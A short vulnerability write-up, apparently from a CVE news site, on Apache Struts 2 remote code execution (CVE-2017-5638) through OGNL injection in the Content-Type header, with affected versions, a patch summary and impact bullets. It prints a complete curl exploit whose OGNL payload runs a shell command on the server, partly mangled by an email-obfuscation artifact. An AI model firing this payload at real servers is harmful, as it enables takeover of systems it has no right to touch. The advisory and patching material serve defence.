Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability resides in the Jakarta Multipart parser of Apache Struts 2. The exploit leverages a flawed exception handling mechanism during file upload. An attacker crafts a malicious `Content-Type` header in an HTTP request. When a file upload is submitted with this malformed header, the parser fails and throws an exception. The error message is constructed using untrusted user input from the header without proper sanitization. This allows the attacker to inject Object-Graph Navigation Language (OGNL) expressions directly into the error message evaluation context. The Struts framework then interprets these injected OGNL expressions on the server side. Since OGNL expressions can execute arbitrary Java code, this vulnerability leads to remote code execution with the privileges of the Struts application server, granting the attacker full control over the affected system.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target-host.com/struts2-showcase/fileupload/doUpload.action`

How Exploit:

Malicious Content-Type header.

OGNL expression injection.

Arbitrary command execution.

Protection from this CVE

Apply official patch.

Upgrade Struts version.

Use alternative parser.

Impact:

Full system compromise.

Data breach.

Service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top